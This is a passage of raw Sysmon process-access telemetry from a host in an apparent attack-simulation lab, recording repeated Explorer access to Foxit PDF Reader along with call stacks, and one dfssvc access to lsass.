Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.322{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.282{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.281{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 